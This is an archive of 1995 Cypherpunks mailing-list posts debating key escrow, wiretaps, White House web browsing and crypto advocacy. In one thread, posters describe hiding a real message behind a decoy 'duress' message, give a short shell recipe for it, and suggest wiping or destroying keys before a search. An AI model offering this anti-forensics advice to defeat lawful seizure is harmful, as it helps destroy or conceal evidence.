Flame way! I get treated worse in person every day!!

From bdavis at thepoint.net Tue Sep 12 20:52:45 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 20:52:45 PDT Subject: GAK/weak crypto rationale? In-Reply-To: <199509122307.QAA02486@mycroft.rand.org> Message-ID:

On Tue, 12 Sep 1995, Jim Gillogly wrote:
>
> > Brian Davis writes:
> > No question. Many high profile public corruption, Mafia, and high-level...
> > ...In our district, we managed to convict almost 20 people...
> > Particularly effective were the court-approved video and audio tapes of...
>
> > I don't doubt that wiretaps may sometimes be abused despite the
> > incredibly onerous review process, but they have positive aspects, too.
>
> In how many of these cases did you fail to get the necessary information
> because of encryption? Has this proportion been changing over the years?

I wasn't personally involved in any of the cases, but I suspect the answer re encryption is zero. There was the time the FBI agent failed to push the record button, however. My response was to the wiretap correlation to career-making cases. I don't believe encryption is widespread enough yet to be a serious problem in the Title III area. It is a potential problem, though, as encryption (rightfully) spreads. The question I am debating with myself, with all of your help, is what the policy "ought to be." Even if I ultimately come down in my own mind on the Cypherpunks side of the line, understand that, as far as policy goes (and, hell, everything else for that matter), I'm a nobody. But I try to make up my own mind about what is right.
EBD > > Jim Gillogly > Hevensday, 21 Halimath S.R. 1995, 23:06 > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From bdavis at thepoint.net Tue Sep 12 20:53:33 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 20:53:33 PDT Subject: GAK In-Reply-To: Message-ID: On Tue, 12 Sep 1995, Mac Norton wrote: > What's technology got to do with it, in principle? If > I write a letter in code, do I have to send the FBI the > key, just in case? ... The distinction, I think, is that for the past 40, 50, 60 ??? years, wiretapping has been available, recently only through court order (lawfully). Encryption changes the status quo. Change brings those who want to hasten it and those who want to stop it. The problem here, at least for me, is what *should* the policy be. You (with one or two exceptions) have provided me with a lot of grist for the mill. My thought process has changed dramatically on the issue, but is still fluid. EBD From hallam at w3.org Tue Sep 12 21:03:34 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 12 Sep 95 21:03:34 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <9509130255.AA03446@sulphur.osf.org> Message-ID: <9509130402.AA22458@zorch.w3.org> >What abuse? Is there an expectation of privacy in Web-world, >such that all users can honestly expect that a site is compelled >to keep its "visitor log" private? Absolutely, just as there is an assumption that private email will not be distributed over USEnet. There is a clear expectation of privacy. Just as the user of a USEnet server has an expectation of privacy. The question of what is legitimate to use log file data for is a very keenly debated one at W3 conferences. 
Phill H-B From bdavis at thepoint.net Tue Sep 12 21:38:18 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 21:38:18 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: <9509130255.AA03446@sulphur.osf.org> Message-ID: On Tue, 12 Sep 1995, Rich Salz wrote: > >Seriously folks I'm very pissed about the abuse of log file information. The > > What abuse? Is there an expectation of privacy in Web-world, > such that all users can honestly expect that a site is compelled > to keep its "visitor log" private? > > Surely not. I recall some bitter postings when a law enforcement agency got access to the log files of a Web page with information about a missing child. Perhaps that feeling can be felt on both sides of the fence. EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From futplex at pseudonym.com Tue Sep 12 23:11:19 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 12 Sep 95 23:11:19 PDT Subject: GAK/weak crypto rationale? In-Reply-To: <199509122051.QAA14953@pipe4.nyc.pipeline.com> Message-ID: <9509130611.AA19154@cs.umass.edu> John Young writes: > In response to an audience question about wiretaps and > crypto, Mr. Michael Nelson of the White House said at the > NIST GAK meeting (paraphrased): > > We are not concerned with bad people using crypto among > themselves, we can handle that. We are more concerned > with their using crypto to communicate with regular > folks, to make legitimate arrangements -- finance, > supplies, travel, and so on -- for their nefarious > deeds. It's the intermix of the bad with the good that's > the problem. Most of this reminds me of observations others have made (maybe here) about LEAs' typical use of wiretapping, commercial records, etc. in gathering evidence. 
It was said that criminals are often tracked/caught because of communications with friends/relatives, and transactions with above-board businesses to rent cars, buy plane tickets, etc. An argument against allegations that free crypto is hazardous proceeds, then, by pointing out that such contacts with *ahem* "regular folks" will be conducted in the clear, or at least that one party will be cooperative with investigators. Whether or not I encrypt my conversation with the Phil Zimmermann Travel Agency, however, doesn't affect the ability or inclination of the PZTA to divulge its records to the TLAs. They would no longer beable (old a.r.k. joke) to learn the contents of the communication directly from a wiretap. But if I understand the technology correctly, they could certainly trace an encrypted call to determine the identity of the other party. After that it's a trivial matter to ask the other party to reveal transaction records. So I don't see how the strong encryption of the "good" significantly interferes with The Legitimate Needs of Law Enforcement in and of itself. (As an aside, the situation may get murky when the Phil Zimmermann Travel Agency carries out transactions over the net with cryptographically sound digital pseudonyms. Depending on the circumstances, true ecash with reasonable payor anonymity may also need to be involved. This is where I suspect untraceable transactions make the LEAs uncomfortable: untraceable garden variety transactions) > Maybe someone else at the meeting heard this differently > and will comment, but this seems to mean that the Feds can > track, and maybe crack, the crypto-intercomm of "bad > people" so long as it is not buried in a torrent of public > crypto use. And not commingled with lawful, ECPA- > protected(?), communication. Hmmm. The bit about "the intermixing of bad and good" is puzzling. "Bad" and "good" seem to be defined in terms of the identities of the parties to a communication. 
Figuring those out isn't hindered by strong crypto per se. I remain unclear as to the source of their expressed concern. Your paraphrase of Nelson's statement strikes me as remarkable. Doesn't "we are not concerned with bad people using crypto among themselves" run completely counter to all the hyperbole about terrorists planning OKC II with PGP ? Does anyone have an exact quotation ? At any rate, sign me up as a "bad person".... Incidentally, recent events in France highlight the absurdity of Les Quatres Chevaliers. The French government's crypto registration requirements don't seem to have been much of a deterrent to the serial Metro bombers -- quelle surprise ! I hope someone in Washington is paying attention. -Futplex From loki at obscura.com Tue Sep 12 23:41:09 1995 From: loki at obscura.com (Lance Cottrell) Date: Tue, 12 Sep 95 23:41:09 PDT Subject: Mixmaster posting poll Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I am about to release Mixmaster 2.0.2 This version will not contain the Socket code, but will have a bunch of bug fixes. One of the things I am modifying is the posting to news feature. Mixmaster supports posting through either a local inews program, or through a mail-to-news gateway. There seem to be two flavors of the latter: group.name at gateway.com and mail2news at gateway.com Newsgroups: group.name I really only want to support one of these standards. Which is more standard? Is there a trend towards one becoming the dominant standard? The next version should be out within 48 hours. 
-Lance

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche
----------------------------------------------------------

From nobody at REPLAY.COM Wed Sep 13 00:10:27 1995 From: nobody at REPLAY.COM (Anonymous) Date: Wed, 13 Sep 95 00:10:27 PDT Subject: NYT on GAK In-Reply-To: <199509111316.JAA02859@pipe2.nyc.pipeline.com> Message-ID: <199509130710.JAA26140@utopia.hacktic.nl>

Adam Shostack wrote:
> It's a good thing the administration only wants to outlaw
> cryptography, not anonymity.

But you can't have strong anonymity without strong cryptography.

From sameer at c2.org Wed Sep 13 00:24:37 1995 From: sameer at c2.org (sameer) Date: Wed, 13 Sep 95 00:24:37 PDT Subject: Community ConneXion & its new look Message-ID: <199509130719.AAA12672@infinity.c2.org>

Community ConneXion is in the process of upgrading its web presence and image. If you'd like to keep abreast of developments, check http://www.c2.org regularly-- most of the changes are in terms of focus & marketing angle, but new services should be appearing soon as well.
-- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From damion.furi at the-matrix.com Wed Sep 13 04:58:40 1995 From: damion.furi at the-matrix.com (DAMION FURI) Date: Wed, 13 Sep 95 04:58:40 PDT Subject: Whitehouse "dissident In-Reply-To: <8B0F439.000504F727.uuout@the-matrix.com> Message-ID: <8B10180.000504F829.uuout@the-matrix.com> TCM|We don't believe in "security through obscurity," do we? The notion that we |are "safe" if the White House, or (horrors!) Janet Reno herself, are not |reading our list or the Web sites on various issues, is the same kind of |security the ostrich thinks he has with his head in the sand and his butt |in the air. Maybe so, but we don't have to like it. And I don't. But it's not so much their access, per se, that I object to. It's their potential intentions, all things considered, and the fact that they aren't at all open about such monitoring. TCM|If you want to be unheard by the Feds, and the White House, and the FBI, |and GCHQ, and Mossad, etc., then don't post publically. If you want your |own access to Web sites kept private, push for the development of Web |proxies ("Web remailers"). Mix or Flame is fine. :) furi at the-matrix.com pgp-public-key at demon.co.uk C1225CE1 RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support From buster at klaine.pp.fi Wed Sep 13 05:03:23 1995 From: buster at klaine.pp.fi (Kari Laine) Date: Wed, 13 Sep 95 05:03:23 PDT Subject: Whitehouse "dissident" and net monitoring Message-ID: <199509131202.AA15294@personal.eunet.fi> > From: lindat at iquest.net (Linda Thompson, American Justice Federation) > > The National Security Agency presumably can monitor > >subversive communication on the Internet without leaving any > >trace by "sniffing packets" at traffic nodes. 
Well, they are just doing what their charter says they should be doing -
gathering information.

> >    It turns out that computers from inside the White House have
> >kept pretty good tabs on information available on Whitewater,
> >Vince Foster, and Mena at a few key repositories on the World-
> >Wide Web, a subset of the Internet.

I think that's because White House workers have access to the net and of
course they are surfing like all the rest of us - they are just people, you
know :-) If that were part of some hard-level information gathering, I
assure you they would not leave such clear traces.

> >Office of the President between August 28 and August 31. If the
> >White House is showing a similar interest in other sites on the
> >World Wide Web, that would amount to a monitoring operation of
> >considerable magnitude.

So are you saying the White House by itself checked out those places, or
are you saying that *people* working inside the White House happened to be
interested in issues available on those sites and accessed them? And so
what - it is public information when it is on the WWW, isn't it?

> >    In light of this information, I have the following questions:

My guesses are

> >(1) Does this constitute "casual browsing" by White House staff, or
> >    is it, in light of the considerable time and effort spent during
> >    regular business hours, part of a monitoring or intelligence operation?

Probably both.

> >(2) For what purpose is the information transferred to the White House used?

Probably to read it and maybe learn something from it :-)

> >(3) Does the White House keep information from these web sites on file,
> >    and does the White House keep a file on the persons responsible for
> >    these web sites?

Hell, I am keeping my own records, and on the other hand I am in the process
of getting/buying/snatching/building a system where I could automatically
scan all the newsgroups with some kind of AI system and keep an eye on
certain FTP, GOPHER, WAIS, WWW and so on, to keep me better informed.
This is partly because this information from the internet is getting out of
proportion AND quite a big part of it is just rubbish and a waste of your
time.

> >(4) Is the April 9 statement by David Lytel of the White House Office of
> >    Science and Technology to Amy Bauer of Copley News Service that the
> >    administration does not monitor anti-Clinton activity on the web still
> >    operative?

Probably they do, and they really should. If I were Mr. Clinton (which I
luckily am not) I would want my adjutants to prepare a report for me each
morning summing up all the possible comments round the subjects Clinton and
The USA from the NET. That would be a very precious source of feedback to
fine-tune your acts. And that information is real time.

A totally different thing which somehow belongs to this subject: should
intelligence bodies watch the net? I am in the middle of reading the
Spycatcher book. Btw, I don't understand all the hype round it, and I would
say there is not enough substance in that book to ban its printing in
certain countries. Anyway, again, in that book it becomes clear that the
riskiest part of being an agent, and therefore one of the best ways to
unveil them, is to concentrate on their communications with the
coordinators in that particular country or on the communication directed to
the country behind the operation. So clearly, to make agents more
successful, their communication is the one needing new techniques - how
about the internet? It is accessible almost everywhere and you can get an
account without giving your real identity. By using certain sites you just
call in from a telephone box, give a little information or in some places
none, and you are ready for almost totally untraceable communication. I bet
they are using it already a lot to replace clumsy radio communication.
Don't get me wrong, I vote for freedom of speech (which is getting
slimmer), privacy (of which there is not much left), no regulation on
encryption (which is not going to be), but I don't like these things being
used against my country's security and to steal our intellectual property.
Based on this I tend to think every self-respecting intelligence
organization must have those taps; otherwise they are not doing their job
properly.

> "When even one American -- who has done nothing wrong -- is forced by fear
> to shut his mind and close his mouth, then all Americans are in peril."
> Harry Truman

Truman might have been one of the best presidents the US ever had, but talk
is talk and deeds are deeds.

The comments and reasoning are totally my own imagination; my employer would
probably disapprove of them and they certainly don't represent my employer's
opinions.

Be careful out there ...

Best Regards
Kari Laine

Kari Laine               buster at klaine.pp.fi
LAN Vision Oy            Tel. +358-0-502 1947
Sinikalliontie 14        Fax  +358-0-524 149
02630 ESPOO              BBS  +358-0-502 1576/1456
FINLAND

From hugh at ecotone.toad.com Wed Sep 13 05:39:28 1995
From: hugh at ecotone.toad.com (Hugh Daniel)
Date: Wed, 13 Sep 95 05:39:28 PDT
Subject: ADMIN: How to find out if you have been culled from the list
Message-ID: <9509131238.AA22758@ecotone.toad.com>

If I (or any software I write) remove a user from the list, the user's
entry now gets appended to the culled.users file. Since I was keeping a
list anyway, I have set it up so that anyone can email/download the list of
recently culled cypherpunks via majordomo. If you stop getting your CP drug
for too long, before sending a note to the list (shame!) ask for this file
to see if I culled you. If you forget how to get a file, send a help message
to majordomo at toad.com.

Here is a quick (emacs) example of how to get the file:

To: majordomo at toad.com
--text follows this line--
get cypherpunks culled.users
end

and the file will show up soon. This is a very boring file (dates and email
addresses).
You might want to save this message away, so you will have it to reference
if need be.

Now, you get back to writing that great crypto/UI package!

		||ugh Daniel
		Sometimes Postmaster
		Always Majordomo Potty Trainer

From jya at pipeline.com Wed Sep 13 05:44:35 1995
From: jya at pipeline.com (John Young)
Date: Wed, 13 Sep 95 05:44:35 PDT
Subject: GAK/weak crypto rationale?
Message-ID: <199509131244.IAA07887@pipe4.nyc.pipeline.com>

Responding to msg by futplex at pseudonym.com (Futplex) on Wed, 13 Sep 2:11 AM

>Your paraphrase of Nelson's statement strikes me as
>remarkable. Doesn't "we are not concerned with bad
>people using crypto among themselves" run completely
>counter to all the hyperbole about terrorists planning
>OKC II with PGP ? Does anyone have an exact quotation
>? At any rate, sign me up as a "bad person"....

"Bad people" is my euphemism for Mr. Nelson's "terrorist" -- which brought
snorts from the audience. Yes, his statement about not being concerned with
crypto use among terrorists was surprising.

On a verbatim transcript: Mr. Ed Roback of NIST, the KE meet director, said
that a complete transcript of the proceedings will not be published, only a
summary report at some point, and then, after the September 15 session,
some version will appear in the Federal Register for public comment. The
summary report should appear eventually at the NIST web site -- the CSSPAB
site has reports for prior KE sessions in the annual reports. See for 1994,
and similar for earlier years, on key escrow documents. To amplify what Tim
said, the CSSPAB site has very interesting docs.

From hfarkas at ims.advantis.com Wed Sep 13 06:03:12 1995
From: hfarkas at ims.advantis.com (Henry W. Farkas)
Date: Wed, 13 Sep 95 06:03:12 PDT
Subject: Scientology tries to break PGP - and
Message-ID: 

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Sep 1995, S. Keeling wrote:

> I would just like to point out that, when a LEA comes to you
> to get at the contents of your computer, (s)he is not going to
> patiently wait while your system wipes the offending evidence off your
> hard disk. The first thing they do is make a copy of everything, so
> they can work from the copy. Besides, you do have backup tapes laying
> around all over the place, don't you?

Actually, I have *everything* laying around all over the place but I
suppose that's off-topic.

They have to decrypt the file sometime if they want its "contents".

I use the -w option when encrypting. After encryption, the "dummy" file
(would be) embedded and the plaintext is wiped. The only "secret" key is
the "fake" key. The "real" key is under the blender in the kitchen. (If I
get busted and they search under the blender I will write back if I'm in a
position to do so. Not that I have anything to get busted for of course.
:) Don't back up plaintext and what is the problem here? Where will they
get the "real" data from? What does it matter where the decryption takes
place?

And no, I don't have backup tapes laying around; I use a Zip Drive! :-)

===========================================================================
Henry W. Farkas            | Me? Speak for IBM? Fat chance.
hfarkas at ims.advantis.com   |------------------------------------------------
hfarkas at vnet.ibm.com       | http://newstand.ims.advantis.com/henry
henry at nhcc.com             | http://www.nhcc.com/~henry
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53
Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack
"We're not fast, but it's not bad, and we're cheaper than the guy down the
street!"
===========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta
-----END PGP SIGNATURE-----

From futplex at pseudonym.com Wed Sep 13 06:30:47 1995
From: futplex at pseudonym.com (Futplex)
Date: Wed, 13 Sep 95 06:30:47 PDT
Subject: (NOISE) Re: White House MONITORS Web Pages !
In-Reply-To: <8B10180.000504F829.uuout@the-matrix.com>
Message-ID: <9509131330.AA25431@cs.umass.edu>

This is NOISE !

DAMION FURI writes:
> Maybe so, but we don't have to like it. And I don't. But
> it's not so much their access, per se, that I object to.

Why the hell do you care ? Someone has a home page for something on the
Web. Someone at the White House looks at it. So what ? You object to the
fact that somebody in the government has a Web browser and *gasp* uses it
to read stuff on the WWW ???

> It's their potential intentions,

You take moral offense to what you think someone else _might_ be thinking ?
Sounds like you believe in thoughtcrime. Banned any good books lately ?

> all things considered, and
> the fact that they aren't at all open about such monitoring.

This is absurd. You expect the White House to issue a press release every
time a staffer clicks on a URL ?

"WASHINGTON (UPI) The Clinton Administration unveiled plans today to
add several new sites to the White House bookmarks list. At a hastily
arranged press briefing this morning, Defense Secretary William Perry
told reporters that the changes would be implemented in close
consultation with NATO allies. There was little immediate reaction
from Capitol Hill. Members on both sides of the aisle said they
needed time to study the proposal in detail."
Someone please tell me this is just an extremely premature April Fool's
joke...

-Futplex

From ab411 at detroit.freenet.org Wed Sep 13 06:33:14 1995
From: ab411 at detroit.freenet.org (David R. Conrad)
Date: Wed, 13 Sep 95 06:33:14 PDT
Subject: Scientology tries to break PGP - and
Message-ID: <199509131332.JAA29256@detroit.freenet.org>

Henry W. Farkas writes:
>On Tue, 12 Sep 1995, S. Keeling wrote:
>
>> I would just like to point out that, when a LEA comes to you
>> to get at the contents of your computer, (s)he is not going to
>> patiently wait while your system wipes the offending evidence off your
>> hard disk.
...
>> they can work from the copy. Besides, you do have backup tapes laying
>> around all over the place, don't you?
>
>They have to decrypt the file sometime if they want its "contents".
>
>I use the -w option when encrypting. After encryption, the "dummy" file
>(would be) embedded and the plaintext is wiped.
...

And the idea is that on decrypting with the 'wrong' key, it outputs the
dummy file rather than the real plaintext, correct?

> ... Don't back up plaintext and what is the problem here?
>Where will they get the "real" data from? What does it matter where the
>decryption takes place?
...

Why would they use your copy of the program to decrypt the file? They
could just use a version that lacked this 'feature'. Of course, they still
couldn't get at the real plaintext unless you gave them the key, but you
are right back to the same old standoff where they say, "Give us your
key," and you (try to) say, "No."

-- 
David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee -- Finger conrad at grfn.org for public key
Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.
From majordomo at europages.com Wed Sep 13 06:47:39 1995
From: majordomo at europages.com (majordomo at europages.com)
Date: Wed, 13 Sep 95 06:47:39 PDT
Subject: Majordomo results: (NOISE) Re: White House MONITORS Web Pag
Message-ID: <9509131453.AA14290@europages.com>

--

END OF COMMANDS

**** Help for majordomo:

This is Brent Chapman's "Majordomo" mailing list manager, version 1.93.

In the description below items contained in []'s are optional. When
providing the item, do not include the []'s around it.

It understands the following commands:

    subscribe <list> [<address>]
        Subscribe yourself (or <address> if specified) to the named <list>.

    unsubscribe <list> [<address>]
        Unsubscribe yourself (or <address> if specified) from the named <list>.

    get <list> <filename>
        Get a file related to <list>.

    index <list>
        Return an index of files you can "get" for <list>.

    which [<address>]
        Find out which lists you (or <address> if specified) are on.

    who <list>
        Find out who is on the named <list>.

    info <list>
        Retrieve the general introductory information for the named <list>.

    lists
        Show the lists served by this Majordomo server.

    help
        Retrieve this message.

    end
        Stop processing commands (useful if your mailer adds a signature).

Commands should be sent in the body of an email message to "majordomo".

Commands in the "Subject:" line NOT processed.

If you have any questions or problems, please contact "Majordomo-Owner".

From frissell at panix.com Wed Sep 13 07:12:24 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 13 Sep 95 07:12:24 PDT
Subject: Whitehouse "dissident" web site monitoring?
Message-ID: <199509131412.KAA26837@panix.com>

At 06:03 PM 9/12/95 -0400, Brian Davis wrote:
>Unbelievable!!!  To add to this distressing truth, I have learned that
>the White House also subscribes to a number of newspapers and periodicals
>which are reviewed for things of interest to the Administration and to
>the President.

I I I I I I ammmmmmmmmm shocked!

The government, as you no doubt know, sometimes operates under different
rules. Thus when the "Red Squad" (Intelligence Division) of the New York
City Police (located in that big building on the North side of Vandam
between Greenwich and Houston BTW) was sued for maintaining files on
"lawful protest groups" they entered into a consent agreement to refrain
from this sort of thing. Later, the courts said that this agreement meant
that the cops couldn't even listen to WLIB radio (NYC's favorite radical
African-American station) to find out in advance where rallies were going
to be.

Since the White House is doing this reading of sites with public funds and
since that institution is the most powerful in the world --- it can nuke
its enemies, for example --- people are naturally interested to discover
if they are the subject of an investigation.

This is a demonstration of the unintended effect of electronic
surveillance technology.
The fact is that it can do more harm to the authorities than to the public.
The Nixon Tapes/The Thompson Square Park Riot Video/The Rodney King Video.
Since those in power are more interesting than ordinary people, they
represent a more "target-rich environment." Information about their
activities has greater commercial value and is thus more likely to see the
light of day.

DCF

"There are more of us than there are of you."

From nobody at REPLAY.COM Wed Sep 13 07:15:44 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 13 Sep 95 07:15:44 PDT
Subject: Dirty Jobs Ad
Message-ID: <199509131415.QAA00857@utopia.hacktic.nl>

NY Times, Sept 13, 1995. For the outawork:

   C.I.A.'s Chief Calls Covert Action a Must

   Washington, Sept. 12 -- The Central Intelligence Agency will
   maintain, and perhaps increase, its covert operations abroad and
   continue to hire informers from terrorist cells, military regimes
   and drug syndicates, the new Director of Central Intelligence said
   today.

   The Director, John M. Deutch, called espionage "the core mission of
   the Central Intelligence Agency." That mission has been questioned
   by critics of the C.I.A. in Congress and the foreign-policy
   establishment, who wonder whether the rewards of secret information
   are worth the risks of undertaking covert operations and recruiting
   murderous and corrupt foreign agents.

-----

From adam at bwh.harvard.edu Wed Sep 13 07:17:23 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Wed, 13 Sep 95 07:17:23 PDT
Subject: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130226.AA22319@zorch.w3.org>
Message-ID: <199509131416.KAA06476@bwh.harvard.edu>

Phill wrote:

| If we are serious about privacy I think we should be very clear that
| we respect the privacy of Whitehouse staffer and staffers in the
| Senate and House. I'm not being partisan about this, I have put a
| lot of effort into getting participation from the right as well as
| the left. I've just not been very successful in that area.

Sure.
I'll respect their privacy as much as they, and the organizations they
oversee, respect mine. I'll use as the representative organizations the
IRS and the Social Security Administration, which respect my privacy so
much that they use prison inmates to process paperwork. If I was in a
nasty mood, I'd add the USPS.

Sarcasm aside, they show no interest in other people's privacy. Why should
we go out of our way to do anything but show them how bad the situation is?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					       -Hume

From aba at dcs.exeter.ac.uk Wed Sep 13 07:28:22 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Wed, 13 Sep 95 07:28:22 PDT
Subject: Scientology tries to break PGP - and
Message-ID: <759.9509131426@exe.dcs.exeter.ac.uk>

> Why would they use your copy of the program to decrypt the file?
> They could just use a version that lacked this 'feature'. Of
> course, they still couldn't get at the real plaintext unless you
> gave them the key, but you are right back to the same old standoff
> where they say, "Give us your key," and you (try to) say, "No."

I agree, you can't rely on them using your doctored program; it must be
resilient to them having a copy of all of your software, and their own
fresh copies of software, and a backup of each copy before starting, and
still provide plausible deniability.

Here's an idea to do just that, perhaps something which could be added to a
future PGP. I reckon this is what you'd do:

% pgp -es duress
% pgp -es msg
% stealth < msg.pgp > msg.stl
% cat msg.stl >> duress.pgp
% pgp +makerandom=1234 noise
% cat noise >> duress.pgp
% pgp -a duress.pgp
% mail someone < duress.asc

The pgp +makerandom= is an undocumented feature of pgp > 2.6 (not sure
exactly when it got added, Colin Plumb pointed it out when I asked him
about random nos for stealth). So what this means is that you are using PGP
itself to hide a stegoed message.
This would be good for the guy from FACTnet (forgotten his name) who just
got hit by the CoS; he could hold out for a while, then give up his key,
the duress message would appear, and the real message would be explained
by having a script to do this on his HD, and having long since burned the
disk with a script to do the above on it:

% pgp -es msg
% pgp +makerandom=4567 noise
% cat noise >> msg.pgp
% pgp -a msg.pgp
% mail someone < msg.asc

ie the idea is that you pad your message to a fixed size for the express
purpose of hampering traffic analysis (of the type of "my, Alice did have
a lot to say to Bob that day"). It would be even better cover if the thing
had gotten sent through a remailer, as this kind of thing is expected of
type I remailer traffic (before mixmaster which does the packetizing for
you).

So the duress message really looks like this:

+---------+---------------------------+--------------------+--------+
| pgp hdr | IDEA encrypted duress msg | stealthed real msg | noise  |
+---------+---------------------------+--------------------+--------+

the IDEA block has a length field, but you can increase the length without
damage to include the following stealthed stuff, as the underlying stuff
which is IDEA encrypted will know its length on decryption, and the
following junk will just be discarded.

So, Alice and her secret key ring (encrypted) get nabbed by Charlie (CoS?),
and she is coerced into divulging her passphrase. And if and when it is
noticed that the message was longer than it ought to be (CoS that smart?
substitute the NSA and they'd notice for sure), Alice explains away the
junk on the end by pointing them to the fact that all of her messages were
exactly (say) 16k long, and that she was using the noise-only script, and
that the message really is this:

+---------+---------------------------+-----------------------------+
| pgp hdr | IDEA encrypted duress msg | noise                       |
+---------+---------------------------+-----------------------------+

Having this built in to PGP provides plausible deniability, as you have no
extra software which might look incriminating unless you managed to
dispose of it first, if it comes as stock. Even as a standalone it would be
feasible, but you'd need to be careful to hide the first script, maybe on
an encrypted drive or something. This is not good tho, as you ideally want
nothing left, just a standard pgp implementation, and they have no way to
prove anything; they can be suspicious, but suspicion can't put you in
jail, and if you say there is no message, only random junk for padding
purposes to foil traffic analysis, this would be plausible, especially if
they really had captured a whole load of 64k messages.

You really need to use stealth2 for that, as stealth1.x gives the game
away for determined attackers, but for stealth2, I need some cryptographic
opinions on whether this is secure:

	0 < x < N		N is RSA modulus

and converting that to a number x' in the range:

	0 < x' < 2^(int(log2(N) + 1) + 64)

(ie the next power of 2 over N multiplied by 2^64) and the transformation
supplied by:

	x' = N * f(MD5(x)) + x

where f(y) is a function which converts from range 0 <= y < 2^128 to a
range 0 <= f(y) < scale. Scale is some constant defined in terms of N, and
n other randomisation. Is that safe? x is random, and will be different
even for a repeat encryption of the same file, as PGP is using a random
IDEA session key. So are there any brute force attacks on that which would
be cheaper than attacking 128 bit IDEA?
PGP's random number generator also makes extensive use of MD5, so I'm
taking the use of MD5 as secure as a given. If it is thought to be
dangerous for some reason (it is after all some kind of signature on
itself), presume that you know N and x' but not x; the question is whether
the equation can be brute-force reversed in a less than 128 bit brute force
attack.

I'm neglecting to consider the rand() calls, which I'm not expecting to
add security, but are just a mechanism to stir the value with to get more
random nos, as occasionally the algorithm needs more than one, if the first
fails, etc.

The other approach, presuming that you can get to the data before they
can, is to use secure drive, and securely wipe (or physically destroy -
data on floppy) the encrypted key. Then you can give your passphrase
without concern. Could land you in trouble for destruction of evidence or
some such tho, so innocent, plausible deniability would be better.

Adam

From trei at process.com Wed Sep 13 07:34:42 1995
From: trei at process.com (Peter Trei)
Date: Wed, 13 Sep 95 07:34:42 PDT
Subject: CYPHERPUNK considered harmful.
Message-ID: <9509131434.AA23717@toad.com>

I mailed this yesterday, but it never showed up on the list.

-----BEGIN PGP SIGNED MESSAGE-----

V Z Nuri has actually stolen my thunder a bit here, with his post on
'crypto confrontation', but I've been working on this stuff since Friday.
I have a somewhat different approach, and I'd like to see some comment.

		"CYPHERPUNK" considered harmful

I would like to propose that we, the 'cypherpunks', are making a strategic
error, which will make it far more difficult to achieve the goal we share.

I realize that many will bridle at the notion that we have a common goal,
but I think that most of the participants in this list will agree with the
following:

	"Strong cryptography is a powerful new technology, of which the
	widespread and unfettered use should be encouraged."
Our error lies in our approach to encouraging the widespread use of crypto.
It is an error of hubris - overweening pride. We too often think of
ourselves as an elite - smarter and better in various ways than our
non-cpunk neighbours. We refer to these others as 'Joe Sixpack' and other
such derogatory terms. The problem is that in doing so we are marginalizing
ourselves.

We call ourselves 'cypherpunks'. While this is derived from the SF term
'cyberpunk', consider the image we are creating for ourselves: A 'punk' is
a marginalized young adult, one who rejects the norms of his or her
society, and takes delight in irking those around him with his or her
rejection. The older of us will think of James Dean in 'Rebel Without a
Cause', or Brando in 'The Wild One'. Later, you get images such as Peter
Fonda in 'Easy Rider', and more recently, Sid Vicious and other icons of
the 'punk rock' movement.

These punks are often romantic figures, but in reality they started
marginalized, remained marginalized, and died marginalized. They were
ineffective in changing the core values of the society in which they lived
(yes, I know that most of the examples I've given are fictional characters,
but I'm talking about the type of people they are modeled on).

We, the 'cypherpunks', have embraced this label, taking pride in our
technical abilities, and acting as if we can institute 'cryptoanarchy'
without getting a majority of the population to support us. This is a bad
approach. The overwhelming majority of the US population is not alienated
from the US government, and regards with suspicion those who are.

I suggest that we drop the term 'cypherpunk' - it has the wrong
connotations to get our ideas into the mainstream. I don't have a perfect
replacement yet:

1. I want to get away from the strings 'crypt' and c[iy]pher - they sound
   too cloak-and-dagger.
2. It should imply that the labelees are level-headed, responsible
   citizens, not longhaired weirdos.
3. It should make itself difficult to invert - the classic example is the
   pro-choice/pro-life dichotomy, where each side refuses to acknowledge
   the other's terminology.
4. A cute and apropos acronym would help.

Many on this list have been advocating cryptography primarily as a means
of liberating ourselves from an intrusive and overcontrolling state. This
is a goal that leaves most Americans cold - they correctly regard their
country as one of the most free in the world, and are alarmed by people
who want major changes in the status quo.

To get crypto accepted into the mainstream, we need to make it something
the average person expects and wants to use, for goals that make
mainstream sense - not for some distant, idealist utopian cryptoanarchic
libertarian dream.

Crime is a major political hot button these days. Advocating crypto for
